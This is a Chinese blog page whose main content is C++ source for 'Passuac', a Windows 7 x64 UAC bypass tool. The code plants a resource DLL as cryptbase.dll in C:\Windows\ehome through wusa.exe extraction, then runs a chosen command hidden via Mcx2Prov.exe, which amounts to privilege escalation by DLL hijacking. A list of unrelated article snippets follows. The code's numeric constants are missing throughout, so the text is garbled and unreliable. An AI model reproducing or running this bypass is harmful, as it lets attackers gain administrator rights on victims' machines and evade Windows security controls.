// Passuac.cpp : Defines the entry point for the console application.

//

#include "stdafx.h"

#include <Windows.h>

#include <stdio.h>

#include  <direct.h>

BOOL IsUserInAdminGroup() //判断是否在管理员组

{

    BOOL fInAdminGroup = FALSE;

    HANDLE hToken = NULL;

    HANDLE hTokenToCheck = NULL;

    DWORD cbSize = ;

    OSVERSIONINFO osver = {};

    osver.dwOSVersionInfoSize = sizeof(osver);

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_DUPLICATE, &hToken))

        goto Cleanup;

    if (!GetVersionEx(&osver))

        goto Cleanup;

    if (osver.dwMajorVersion >= )

    {

        TOKEN_ELEVATION_TYPE elevType;

        if (!GetTokenInformation(hToken, TokenElevationType, &elevType, sizeof(elevType), &cbSize))

            goto Cleanup;

        if (TokenElevationTypeLimited == elevType)

        {

            if (!GetTokenInformation(hToken, TokenLinkedToken, &hTokenToCheck, sizeof(hTokenToCheck), &cbSize))

                goto Cleanup;

        }

    }

    if (!hTokenToCheck)

    {

        if (!DuplicateToken(hToken, SecurityIdentification, &hTokenToCheck))

            goto Cleanup;

    }

    BYTE adminSID[SECURITY_MAX_SID_SIZE];

    cbSize = sizeof(adminSID);

    if (!CreateWellKnownSid(WinBuiltinAdministratorsSid, NULL, &adminSID, &cbSize))

        goto Cleanup;

    if (!CheckTokenMembership(hTokenToCheck, &adminSID, &fInAdminGroup))

        goto Cleanup;

Cleanup:

    if (hToken)    CloseHandle(hToken);

    if (hTokenToCheck) CloseHandle(hTokenToCheck);

    return fInAdminGroup;

}

BOOL IsRunAsAdmin() //判断是否以管理员权限运行

{

    BOOL fIsRunAsAdmin = FALSE;

    DWORD dwError = ERROR_SUCCESS;

    PSID pAdministratorsGroup = NULL;

    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;

    if (!AllocateAndInitializeSid(

        &NtAuthority,

        ,

        SECURITY_BUILTIN_DOMAIN_RID,

        DOMAIN_ALIAS_RID_ADMINS,

        , , , , , ,

        &pAdministratorsGroup))

    {

        dwError = GetLastError();

        goto Cleanup;

    }

    if (!CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin))

    {

        dwError = GetLastError();

        goto Cleanup;

    }

Cleanup:

    if (pAdministratorsGroup) FreeSid(pAdministratorsGroup);

    return fIsRunAsAdmin;

}

BOOL writedll64()

{

    char Szpath[MAX_PATH] = {};

    char uacexqute[] = {};

    DWORD   dwWrite=;

    WORD wResID;

    HANDLE  hFile = CreateFileA("cryptbase.dll",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);

    if (hFile == INVALID_HANDLE_VALUE)

    {

        printf("Getlasterror:%d.\r\n",GetLastError());

        return ;

    }

    HRSRC hrsc = FindResource(NULL,MAKEINTRESOURCE(IDR_TESTDLL1),L"TESTDLL");

    HGLOBAL hG = LoadResource(NULL, hrsc);

    DWORD   dwSize = SizeofResource( NULL,  hrsc); 

    WriteFile(hFile,hG,dwSize,&dwWrite,NULL);

    CloseHandle( hFile );

    getcwd(Szpath, MAX_PATH);

    strcat(Szpath,"\\cryptbase.tmp");

    system("makecab cryptbase.dll cryptbase.tmp");

    sprintf(uacexqute,"%s /extract:C:\\Windows\\ehome\\",Szpath);

    ShellExecuteA(NULL, "open", "wusa.exe", uacexqute, NULL, SW_HIDE);

    //remove("cryptbase*");

    DeleteFileA("cryptbase.dll");

    DeleteFileA("cryptbase.tmp");

    return true;

}

int main(int argc,char* argv[])

{

    FILE* fp;

    char szcmd[] = {};

    char *Options;

    char buffer[] = {};

    STARTUPINFO si={sizeof(si)};

    PROCESS_INFORMATION pi;

    si.dwFlags=STARTF_USESHOWWINDOW;

    si.wShowWindow=TRUE;

    if (argc < )

    {

        printf("[*]:%s Passuac for windows 7 x64\n",argv[]);

        printf("[*]:%s Setp1: passuac\r\n",argv[]);

        printf("[*]:%s Setp2: shell_cmd\r\n",argv[]);

        printf("[*]:Welcome to www.90sec.org\r\n");

        printf("[*]:Pass uac t00ls By:@90sec\r\n\r\n");

        return ;

    }

    strcpy(szcmd,argv[]);

    char szNewCmd[MAX_PATH] = {};

    wsprintfA(szNewCmd, "\"%s\"", szcmd);

    if (!IsUserInAdminGroup())

    {

        printf("Your not have in Local Administrator Group\r\n");

        printf("Program exit;");

        exit();

    }else

    {

        printf("Your have in Local Administrator Group\r\n");

        printf("PassUac ing.....\r\n");

        if (!IsRunAsAdmin())

        {

            if (!strcmp(szcmd,"passuac"))

            {

                writedll64();

            }else

            {

                ShellExecuteA(NULL, "open", "C:\\windows\\ehome\\Mcx2Prov.exe", szNewCmd, NULL, SW_HIDE);

                Sleep();

                fp = fopen("c:\\programdata\\uac.txt","rb");

                if (fp == NULL)

                {

                    printf("Getlasterror:%d\r\n",GetLastError());

                    return ;

                }

                ZeroMemory(buffer,sizeof(buffer));

                while (fgets(buffer,sizeof(buffer),fp))

                {

                    printf(buffer);

                }

                fclose(fp);

            }

        }

    }

    return ;

}

需要自己写个DLL,来进行参数解析。请看代码把。

代码写的相当烂,但是能够达到地步,还请各位莫笑话。

WIN7 X64 PASSUAC 源码的更多相关文章

  1. tesseract4.0:win10 +x64+vs2015 源码安装(ViewerDebugging)安装记录

    参考文章: https://blog.csdn.net/u013985291/article/details/78295789 https://blog.csdn.net/u013985291/art ...

  2. 16Aspx.com源码2014年7月详细

            Web电子商务网(三层)V2.0源码 2014-07-31   [VS2010] 源码介绍: Web电子商务网(三层)V2.0源码 源码描述: 一.源码特点     采用三层架构开发, ...

  3. win7 x64 +vs2015 + cmake3.10.3编译opencv-3.4.1+opencv_contrib-3.4.1源码,并进行配置

    简介: 一直以来都是在ubuntu下使用opencv,最近因为有<图像处理与模式识别>这门课,需要使用vs2015+opencv提交课程作业,因为opencv官方编译好的exe没有cont ...

  4. qt4.8.7 源码在win7+vs2010环境的x64编译(qt 64位)

    由于qt官网上,没有直接提供x64的安装包,但由于项目需要x64的qt,所以,小编不得不下载qt的源码,经历了一次长达约4个小时的编译过程.今年国庆7天,就遭这事上了,哈哈~~~ 几个下载链接: qt ...

  5. 谷歌开源项目Chromium的源码获取与项目构建(Win7+vs10/vs13)

    转自:http://blog.csdn.net/kuerjinjin/article/details/23563059 从12年那会儿开始获取源码和构建chromium项目都是按照那时候的官方要求用w ...

  6. mpusher 源码编译 for windows X64

    mpusher 源码编译 for windows X64 对于java我是小白,通过一步步的摸索,将经验总结下来,给更多码友提供入门的帮助.一个人的摸索是很困难的,本教程感谢 [MPush开源消息推送 ...

  7. Windows 10 x64 下编译 Hadoop 源码

    Windows 10 x64 下编译 Hadoop 源码 环境准备 Hadoop并没有提供官方的 Windows 10 下的安装包,所以需要自己手动来编译,官方文档中 BUILDING.txt 文件中 ...

  8. QGIS(2.18.15 源码)+Qt(5/5.9.3)+VS2015(X64)编译

    由于工作要求,今年需要基于Qt搞跨平台的GIS.前期未曾接触过Qt,最近也简单学习了下,开源的QGIS是非常不错的学习资源,下了最新版的QGIS源码,不过在VS2015下却没法直接打开.网上查了很多资 ...

  9. 32位win7+vs2008编译mysql 5.6.22源码并安装

    以下这部分安装说明是来自http://www.2cto.com/database/201407/316681.html的win7+vs2010源码编译mysql,文章最后会说明用vs2008编译遇见的 ...

随机推荐

  1. 哈工大LTP

    http://ltp.ai/ http://pyltp.readthedocs.io/zh_CN/latest/ http://www.cnblogs.com/Denise-hzf/p/6612886 ...

  2. 前端 为什么我选择用框架而不是Jquery

    对于很多习惯用Jquery的前端甚至后端,都很不解,为什么不用Jquery而是框架.觉得框架学起来麻烦,成本高,今天我以我浅薄的知识来总结一下为什么前台开发选择用框架: 前台开发,主要的性能是卡在回流 ...

  3. VS2012如何显示行号

    Tools-Options-Text Editor-All Languages –General – Display

  4. eclipse远程debug Java程序

    使用Eclipse JPDA远程调试Java程序 本文将介绍使用Eclipse JPDA,在Eclipse的开发环境下对远程运行的Java程序进行调试操作. 请按以下步骤进行(本人已经在Eclipse ...

  5. 巨蟒django之权限8:排序&&菜单展开权限归属

    1.权限控制的流程+表结构 内容回顾: wsgi:socket进行收发消息 中间件:(超级重点的面试题)在全局范围内控制django的输入和输出的一个钩子,处理输入和输出说白了就是处理请求和响应req ...

  6. python系列十二:python3模块

    #!/usr/bin/python # This Python file uses the following encoding: gbk #Python3 模块 '''用 python 解释器来编程 ...

  7. 任务04——对四则运算小程序的进一步改进,并学习 Git 中 Branch 的用法

    https://github.com/jinxiaohang/Operation/tree/test01 对于任务2的代码进行优化修改感觉很麻烦,所以直接选择重写代码完成任务四, 任务四很早就发布了, ...

  8. 2014-08-28——PC端几款主流浏览器的内核

    Trident(IE浏览器) Mozilla(Gecko)(熟悉的有Firefox,Flock等浏览器) WebKit(熟悉的有Safari.Chrome等浏览器) Opera(presto)(Ope ...

  9. Nuxt使用scss

    Nuxt中使用scss也很简单,分简单的几步就OK 一.安装scss依赖 用IDE打开项目,在Terminal里通过 npm i node-sass sass-loader scss-loader - ...

  10. MySQL优化器不使用索引的情况

    优化器选择不适用索引的情况 有时候,有乎其并没有选择索引而去查找数据,而是通过扫描聚集索引,也就是直接进行全表的扫描来得到数据.这种情况多发生于范围查找.JOIN链接操作等情况.例如 ; 通过SHOW ...